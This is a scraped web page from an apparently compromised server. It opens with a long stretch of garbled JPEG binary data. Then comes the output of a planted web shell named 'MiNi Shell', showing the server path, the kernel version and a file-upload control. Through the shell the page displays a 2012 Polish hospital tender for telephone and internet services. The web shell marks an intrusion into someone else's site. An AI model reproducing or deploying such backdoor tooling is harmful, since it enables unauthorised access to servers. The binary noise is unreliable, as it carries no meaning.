JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121119/458554-N-2012.html

<p class="kh_header"><b>Oświęcim: USŁUGA KOMPLEKSOWEGO ZABEZPIECZENIA ŁĄCZNOŚCI DLA ZOZ OŚWIĘCIM</b><br>
<b>Numer ogłoszenia: 458554 - 2012; data zamieszczenia: 19.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki Zdrowotnej w Oświęcimiu , ul. Wysokie Brzegi 4, 32-600 Oświęcim, woj. małopolskie, tel. 33 8448230, faks 33 8448384.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.oswiecim.pl    www.przetargi.propublico.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA KOMPLEKSOWEGO ZABEZPIECZENIA ŁĄCZNOŚCI DLA ZOZ OŚWIĘCIM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usługi kompleksowego zabezpieczenia łączności dla ZOZ Oświęcim (telefony, internet). Przedmiot zamówienia obejmuje w szczególności:
1.1.	dzierżawę centrali telefonicznej cyfrowej z programem taryfikacji, 
1.2.	serwis i administracja centrali telefonicznej,
1.3.	doprowadzenie łączy:
a)	ISDN PRA (30B+D) od operatora do centrali w lokalizacji przy ul. Wysokie Brzegi,
b)	3 × ISDN BRA (2B+D) 
	2 do lokalizacji przy ul. Wysokie Brzegi,
	1 do lokalizacji przy ul. Olszewskiego (oddział rehabilitacji),
c)	15 × linia telefoniczna analogowa:
	12 do lokalizacji przy ul. Wysokie Brzegi,
	1 do lokalizacji przy ul. Olszewskiego (poradnia rehabilitacyjna),
	1 do lokalizacji przy ul. Orzeszkowej (poradnia odwykowa),
	1 do lokalizacji w Kętach,
1.4.	zapewnienie usługi telefonicznej w zakresie połączeń telefonicznych lokalnych i strefowych, międzystrefowych, międzynarodowych i do sieci komórkowych w naliczaniu sekundowym generowanych na tym dostępie z centrali wewnętrznej Zamawiającego,
1.5.	tory pod budowę kanału cyfrowego:
a)	relacji ul. Wysokie Brzegi - ul. Olszewskiego,
b)	relacji ul. Wysokie Brzegi - ul. Orzeszkowej,
1.6.	usługi dostępu do Internetu: łącze symetryczne 10 Mbit.

2.	Wymagania:
2.1.	Konfiguracja i funkcje centrali telefonicznej:
a)	pojemność:
	co najmniej 32 łącza wewnętrzne cyfrowe oraz 
	co najmniej 216 łączy analogowych,
b)	łącza miejskie: cyfrowe ISDN PRA (30B+D) oraz 8 analogowych,
c)	zdalne zarządzanie,
d)	zasilanie awaryjne,
e)	stanowisko do zarządzania oraz taryfikacji (serwer z oprogramowaniem),
f)	podgląd alarmów systemu,
g)	statystyki ruchu,
h)	zapowiedzi głosowe,
i)	system podpowiedzi głosowych,
j)	możliwość zarządzania po sieci IP
k)	aparaty systemowe: 
	12 podstawowych z wyświetlaczem, 
	3 wieloliniowe aparaty z min. 12 programowalnymi klawiszami, 
	3 aparaty wieloliniowe z 24 programowalnymi klawiszami,
l)	wybieranie po nazwisku,
m)	numery skrócone,
n)	przełącznica 660 par,
o)	możliwość konfigurowania zestawów sekretarsko dyrektorskich,
p)	możliwość dołączenia urządzeń faksowych do dowolnej wewnętrznej linii analogowej i bezbłędną transmisję faksową (faks grupy III) do wszystkich sieci stacjonarnych,
q)	tworzenie grup abonenckich,
r)	identyfikacja rozmówcy,(funkcja CLIP realizowana na liniach systemowych)
s)	rejestracja połączeń nieodebranych,
t)	zawieszanie rozmów,
u)	przejmowanie rozmów,
v)	połączenia konsultacyjne,
w)	blokowanie aparatu hasłem,
x)	ograniczenie połączeń zewnętrznych (restrykcje),
y)	ponowne wybieranie numeru zewnętrznego,
z)	tranzyt połączeń z łącza miejskiego na łącze miejskie,
aa)	przekazywanie natychmiastowe połączeń,
bb)	przekazywanie połączeń z opóźnieniem w razie braku odpowiedzi,
cc)	połączenie trójstronne,
dd)	rezerwacja połączenia,
ee)	tworzenie grup pick up (przechwytująca) - umożliwia przechwytywanie wywołań z jednego aparatu na inny w danej grupie,
ff)	awizo dla telefonistki,
gg)	elektroniczna książka telefoniczna,
hh)	bezpłatne połączenia pomiędzy numerami wewnętrznymi.

2.2.	Serwis i administracja centrali telefonicznej:
a)	koszty usunięcia awarii i usterek wraz z kosztami części zamiennych ponosi Wykonawca,
b)	wykonywanie na życzenie Zamawiającego czynności administracyjnych w centrali (np. zmiana uprawnień abonentów wewnętrznych, tworzenie grup pick up itp.).

2.3.	Doprowadzenie łączy ISDN i telefonicznych linii analogowych do poszczególnych lokalizacji:
a)	usługi telekomunikacyjne będą świadczone zgodnie z przepisami ustawy z dnia 16 lipca 2004 r. Prawo telekomunikacyjne (Dz. U. z 2004 r. nr 171 poz. 1800 ze zm.) oraz przepisami wykonawczymi,
b)	usługi ISDN winny zapewniać możliwość transmisji cyfrowej w każdym kanale B z prędkością 64 kbps,
c)	usługi winny umożliwiać bezbłędną transmisję faksową (faks grupy III) w dla wszystkich posiadanych przez Zamawiającego urządzeń do wszystkich sieci stacjonarnych,
d)	Wykonawca zobowiązuje się do zachowania numerów obecnie przydzielonych Zamawiającemu; aktualnie Zamawiający posiada numery telefoniczne:
	dla łącza ISDN PRA w zakresie od 8448200 do 8448499, 
	dla łączy ISDN BRA:
	8423522 (met org),
	8423551 (oddział rehabilitacji),
	8424587 (apteka szpitalna), 
	dla telefonicznych linii analogowych:
	8422011, 8422012, 8423940, 8424011, 8424012 (centrala),
	8422211 (tomograf),
	8422272 (pogotowie w Oświęcimiu),
	8422423 (NFZ),
	8423742 (dyrekcja - fax),
	8424743 (dyrekcja),
	8425225 (informatycy),
	8443524 (księgowa),
	8423996 (poradnia rehabilitacyjna), 
	8422977 (poradnia odwykowa),
	8452999 (pogotowie w Kętach).
e)	Wykonawca wyraża zgodę, by na liniach analogowych (w szczególności 8422211 i 8422423) połączenie z Internetem było realizowane przez innego Wykonawcę.

2.4.	Zapewnienie usługi telefonicznej w zakresie połączeń telefonicznych lokalnych i strefowych, międzystrefowych, międzynarodowych do krajów UE i do sieci komórkowych:
a)	rozliczenia za usługi połączeń będą się odbywać na następujących zasadach:
	Wykonawca będzie stosował do rozliczeń za połączenia stawki naliczania sekundowego, 
	Wykonawca nie będzie naliczał opłaty za inicjację połączenia,
	wysokość stawek za usługi telefoniczne nie ulegnie zwiększeniu w czasie trwania umowy,
	w przypadku powszechnego obniżenia stawek za usługi telekomunikacyjne w stosunku do innych abonentów Wykonawca obniży stawki dla zamawiającego w takiej samej proporcji.
b)	informacja o opłacie (AOC) dla wszystkich wychodzących połączeń,
c)	Wykonawca zapewni przełączenie z usług wykorzystywanych dotychczas przez Zamawiającego bez przerw w łączności (ciągła możliwość realizacji połączeń do Zamawiającego na obecnie wykorzystywaną numerację),
d)	płatność wyłącznie na rzecz Wykonawcy - jedna faktura za wszystkie usługi wchodzące w zakres zamówienia,
e)	termin płatności: 30 dni od daty otrzymania faktury VAT przez Zamawiającego,
f)	linie 8422272 (Oświęcim) i 8452999 (Kęty) są podkładami pod numer alarmowy 999.

2.5.	Tory pod budowę kanałów cyfrowych:
a)	w relacjach:
	1 para: ul. Wysokie Brzegi - ul. Orzeszkowej,
	1 para: ul. Wysokie Brzegi - ul. Olszewskiego,
b)	przepływność co najmniej 1024 kbps; przepływność określana jest jako wynik automatycznej negocjacji przez modemy typu Planet GRT-501.

2.6.	Usługi dostępu do Internetu w lokalizacji przy ul. Wysokie Brzegi::
a)	symetryczny dostęp do Internetu po medium światłowodowym
	prędkość transmisji od abonenta min. 10 Mbps 
	prędkość transmisji do abonenta min. 10 Mbps
b)	min. 5 stałych adresów IP dostępnych dla urządzeń Zamawiającego,
c)	adresy IP z zakresów nie blokowanych przez powszechnie uznawane serwery antyspamowe, w szczególności SORBS.net,
d)	zakończenie po stronie zamawiającego - Ethernet (RJ45).
4.	Zgodnie z art. 30 ust. 4 ustawy Pzp Zamawiający dopuszcza produkty równoważne opisywanym.
5.	Zamawiający dopuszcza możliwość powierzenia przez Wykonawcę wykonania części zamówienia podwykonawcom. W takim przypadku Wykonawca zobowiązany jest do wskazania w swej ofercie części zamówienia (zakresu), których wykonanie zamierza powierzyć podwykonawcom.
6.	Zamawiający nie dopuszcza składanie ofert częściowych. Oferty nie zawierające pełnego zakresu przedmiotu zamówienia zostaną odrzucone. 
7.	Czas reakcji po wystąpieniu uszkodzenia  na poszczególnych  usługach (SLA) nie może być dłuższy niż 2 godziny, natomiast czas usunięcia uszkodzenia 12 godzin..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówienia uzupełniającego stanowiącego nie więcej niż 50% zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.21.10.00-8, 64.21.40.00-9, 72.41.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek ten został spełniony przez złożenie:
a)	Oświadczenie Wykonawcy - zał. nr 2 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek ten został spełniony przez złożenie: 

a)  Oświadczenie Wykonawcy - zał. nr 2 do SIWZ; 
b) Wykazu wykonanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie- o charakterystycznie nie niższej niż zamawiane (przepływność 10/10 Mbit/s)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek ten został spełniony przez złożenie:
a)	Oświadczenie Wykonawcy - zał. nr 2 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>. Zamawiający uzna, że warunek ten został spełniony przez złożenie:
a)	Oświadczenie Wykonawcy - zał. nr 2 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>. Zamawiający uzna, że warunek ten został spełniony przez złożenie:
a)	Oświadczenie Wykonawcy - zał. nr 2 do SIWZ;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Dokumenty i oświadczenie, wymienione w Dziale VI;
a ponadto:
2.	Podpisany przez Wykonawcę formularz ofertowy według załącznika nr 1 do SIWZ;
3.	Oświadczenie Wykonawcy według załącznika nr 2 do SIWZ;
4.	Pełnomocnictwo do podpisania oferty - dot. podpisania oferty przez osobę upoważnioną przez Wykonawcę (o ile dotyczy);
5.	Oświadczenie o akceptacji wymagań określonych w SIWZ i załącznikach do niej - poprzez złożenie wymaganych oświadczeń i podpisanie formularza ofertowego;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.oswiecim.pl   www.przetargi.propublico.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego-Dział Zamówień Publicznych pok.33.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2012 godzina 10:00, miejsce: W siedzibie Zamawiającego-Dział Zamówień Publicznych pok.33.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com